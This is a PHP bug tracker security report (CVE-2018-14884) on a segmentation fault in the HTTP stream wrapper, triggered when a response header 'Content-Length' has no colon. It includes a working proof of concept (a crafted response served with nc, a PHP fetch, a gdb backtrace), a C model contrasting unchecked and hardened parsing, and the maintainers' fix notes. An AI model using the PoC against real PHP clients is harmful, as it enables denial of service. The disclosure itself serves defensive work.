Sec Bug #75535 Inappropriately parsing HTTP response leads to PHP segment fault!
Submitted: 2017-11-17 04:35 UTC Modified: 2018-08-03 23:26 UTC
From: orange at chroot dot org Assigned: nikic (profile)
Status: Closed Package: HTTP related
PHP Version: 7.2Git-2017-11-17 (Git) OS: Ubuntu 17.04
Private report: No CVE-ID: 2018-14884
 [2017-11-17 04:35 UTC] orange at chroot dot org
Description:
------------
I fuzzed the HTTP parsing function in the latest version of PHP and found a segmentation fault. It is very easy to trigger this segmentation fault, and it may be vulnerable in some scenarios.

In `ext/standard/http_fopen_wrapper.c#L801`:

`http_header_value` can be a NULL value, so `atoi(NULL)` will lead to a segmentation fault!

https://github.com/php/php-src/blob/9fbb019848cbb0387cb7267489dd91ebb4d9050e/ext/standard/http_fopen_wrapper.c#L801

Test script:
---------------
# cat poc
HTTP/1.1 200 OK
Content-Length

# nc -vvlp 80 < poc &
# php -r 'file_get_contents("http://localhost/");'
Segmentation fault
gdb-peda$ bt
#0  __GI_____strtol_l_internal (nptr=0x0, endptr=0x0, base=0xa, group=<optimized out>, loc=0x7ffff72f0400 <_nl_global_locale>)
    at ../stdlib/strtol_l.c:293
#1  0x00005555558f284b in atoi (__nptr=0x0) at /usr/include/stdlib.h:241
#2  php_stream_url_wrap_http_ex (wrapper=0x55555633f6e0 <php_stream_http_wrapper>, path=<optimized out>, mode=<optimized out>,
    options=<optimized out>, opened_path=<optimized out>, context=<optimized out>, redirect_max=<optimized out>,
    flags=<optimized out>, response_header=<optimized out>) at /home/orange/php-src-master/ext/standard/http_fopen_wrapper.c:801
#3  0x00005555558f3a7d in php_stream_url_wrap_http (wrapper=<optimized out>, path=<optimized out>, mode=<optimized out>,
    options=<optimized out>, opened_path=<optimized out>, context=<optimized out>)
    at /home/orange/php-src-master/ext/standard/http_fopen_wrapper.c:978
#4  0x000055555592baf9 in _php_stream_open_wrapper_ex (path=0x7ffff42632b8 "http://localhost", mode=0x55555602b563 "rb",
    options=<optimized out>, opened_path=0x0, context=0x7ffff42014c0) at /home/orange/php-src-master/main/streams/streams.c:2025
#5  0x00005555558a6129 in zif_file_get_contents (execute_data=<optimized out>, return_value=0x7fffffffc820)
    at /home/orange/php-src-master/ext/standard/file.c:550
#6  0x000055555581965c in phar_file_get_contents (execute_data=0x7ffff421b090, return_value=0x7fffffffc820)
    at /home/orange/php-src-master/ext/phar/func_interceptors.c:224
#7  0x0000555555a2209c in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER () at /home/orange/php-src-master/Zend/zend_vm_execute.h:573
#8  execute_ex (ex=0x0) at /home/orange/php-src-master/Zend/zend_vm_execute.h:60062
#9  0x0000555555a27345 in zend_execute (op_array=0x7ffff427b2a0, return_value=<optimized out>)
    at /home/orange/php-src-master/Zend/zend_vm_execute.h:64091
#10 0x0000555555968426 in zend_eval_stringl (str=0x555556389d50 "file_get_contents(\"http://localhost\");",
    str_len=<optimized out>, retval_ptr=0x0, string_name=<optimized out>)
    at /home/orange/php-src-master/Zend/zend_execute_API.c:1054
#11 0x00005555559684f9 in zend_eval_stringl_ex (str=<optimized out>, str_len=<optimized out>, retval_ptr=<optimized out>,
    string_name=<optimized out>, handle_exceptions=0x1) at /home/orange/php-src-master/Zend/zend_execute_API.c:1095
#12 0x0000555555a2945a in do_cli (argc=0x3, argv=0x555556389cc0) at /home/orange/php-src-master/sapi/cli/php_cli.c:1042
#13 0x00005555556556c2 in main ()
#14 0x00007ffff6f4e3f1 in __libc_start_main (main=0x555555655250 <main>, argc=0x3, argv=0x7fffffffdfe8, init=<optimized out>,
    fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdfd8) at ../csu/libc-start.c:291
#15 0x00005555556557da in _start ()
Actual result:
--------------
Segmentation fault

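Added example, not code from php-src or from the reporter: a minimal C model of the header handling this report describes, with the unchecked atoi() path beside a hardened one, run over constructed responses (the first of which is the poc above). The names here (cl_status, has_prefix_ci, header_value, content_length_unchecked, content_length_checked, scan_headers) and the int-sized bound on the length are assumptions for illustration; php_stream_url_wrap_http_ex itself is not reproduced.

```c
#include <ctype.h>
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum cl_status {
    CL_NOT_CONTENT_LENGTH = 0, /* some other header, or none present */
    CL_OK,                     /* length parsed into *out */
    CL_MISSING_VALUE,          /* no ':' at all, or nothing after it */
    CL_BAD_VALUE,              /* non-digits, or does not fit an int */
    CL_NULL_DEREF              /* unchecked path reached atoi(NULL) */
};

/* ASCII case-insensitive prefix test; header names are case-insensitive. */
static int has_prefix_ci(const char *s, const char *prefix)
{
    for (; *prefix != '\0'; ++s, ++prefix)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix)) return 0;
    return 1;
}

/* Value of a "Name: value" line, or NULL when the line has no ':' at all,
 * which is exactly what the report's poc line "Content-Length" produces. */
static const char *header_value(const char *line)
{
    const char *v = strchr(line, ':');
    if (v == NULL) return NULL;
    do ++v; while (*v == ' ' || *v == '\t');
    return v;
}

/* Unchecked shape, modelled on the report: prefix-match the name, then hand the value
 * pointer to atoi(). php-src had no NULL test; this model returns CL_NULL_DEREF there. */
static enum cl_status content_length_unchecked(const char *line, long *out)
{
    if (!has_prefix_ci(line, "Content-Length")) return CL_NOT_CONTENT_LENGTH;
    const char *v = header_value(line);
    if (v == NULL) return CL_NULL_DEREF;  /* php-src: atoi(NULL) -> SIGSEGV */
    if (out) *out = atoi(v);              /* "" -> 0, "12abc" -> 12, "-1" -> -1, overflow -> UB */
    return CL_OK;
}

/* Hardened shape: exact name plus ':', non-empty all-digit value, strtol() overflow
 * check, so the caller never sees a NULL, truncated, negative or wrapped length. */
static enum cl_status content_length_checked(const char *line, long *out)
{
    if (!has_prefix_ci(line, "Content-Length")) return CL_NOT_CONTENT_LENGTH;
    const char *after = line + strlen("Content-Length");
    if (*after != ':' && *after != '\0') return CL_NOT_CONTENT_LENGTH; /* e.g. "Content-Length-Hint:" */
    const char *v = header_value(line);
    if (v == NULL || *v == '\0') return CL_MISSING_VALUE;
    for (const char *p = v; *p != '\0'; ++p)
        if (*p < '0' || *p > '9') return CL_BAD_VALUE; /* rejects "-1", "12abc", "1e3" */
    errno = 0;
    long n = strtol(v, NULL, 10);
    if (errno == ERANGE || n > INT_MAX) return CL_BAD_VALUE; /* assumes an int-sized length */
    if (out) *out = n;
    return CL_OK;
}

/* Feed each header line of a raw response (status line, headers, blank line) to a
 * checker and return the Content-Length verdict; out may be NULL. */
static enum cl_status scan_headers(const char *response,
                                   enum cl_status (*check)(const char *, long *), long *out)
{
    enum cl_status result = CL_NOT_CONTENT_LENGTH;
    const char *nl = NULL, *p = strchr(response, '\n');  /* skip the status line */
    for (p = p ? p + 1 : NULL; p != NULL && *p != '\0'; p = nl ? nl + 1 : NULL) {
        size_t len = (nl = strchr(p, '\n')) ? (size_t)(nl - p) : strlen(p);
        if (len > 0 && p[len - 1] == '\r') --len;
        if (len == 0) break;                            /* blank line: end of headers */
        char line[256];
        len = len < sizeof line ? len : sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        enum cl_status s = check(line, out);
        if (s != CL_NOT_CONTENT_LENGTH) result = s;
    }
    return result;
}

int main(void)
{
    /* Constructed responses; the first is the report's poc file. */
    static const char *const samples[] = {
        "HTTP/1.1 200 OK\r\nContent-Length\r\n\r\n",
        "HTTP/1.1 200 OK\r\nContent-Length:\r\n\r\n",
        "HTTP/1.1 200 OK\r\ncontent-length: 12\r\n\r\nhello world!",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; ++i) {
        long a = -1, b = -1;
        int u = scan_headers(samples[i], content_length_unchecked, &a);
        int c = scan_headers(samples[i], content_length_checked, &b);
        printf("sample %zu: unchecked=%d/%ld checked=%d/%ld\n", i, u, a, c, b);
    }
    return 0;
}
```

Build with `cc -std=c11 -Wall model.c` (any file name). The poc response reaches the atoi(NULL) point in the unchecked path and a clean CL_MISSING_VALUE in the hardened one; the hardened checker additionally refuses an empty value, trailing garbage, a negative number and an overflowing number, all of which atoi() silently turns into some int. The actual fix commit is linked in the comments below.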
History
 [2017-11-18 11:34 UTC] nikic@php.net
-Status: Open +Status: Closed -Type: Bug +Type: Security -Assigned To: +Assigned To: nikic
 [2017-11-18 11:34 UTC] nikic@php.net
Fixed by https://github.com/php/php-src/commit/0e097f2c96ce31b16fa371981045f224e5a37160.

The issue also exists in PHP 7.0 and 7.1, so I'm adding a security classification. Given control of the remote endpoint accessed by PHP, this provides a denial-of-service vector. As this is a null pointer dereference, it does not appear to be exploitable beyond DoS.
 [2017-11-20 08:14 UTC] stas@php.net
If it's security-related, should be in 5.6 as well?
 [2017-11-20 10:08 UTC] nikic@php.net
@stas: The issue has been introduced in https://github.com/php/php-src/commit/5146d9f8ac170d8ba7109370d732d56dc0777578, which landed in PHP 7.0.16, PHP 7.1.2 and PHP 7.2-dev. It does not affect PHP 5.6.
 [2018-05-03 00:48 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2018-08-03 23:26 UTC] kaplan@php.net
-CVE-ID: needed +CVE-ID: 2018-14884
 
PHP Copyright © 2001-2025 The PHP Group
All rights reserved.
Last updated: Mon Mar 31 07:01:29 2025 UTC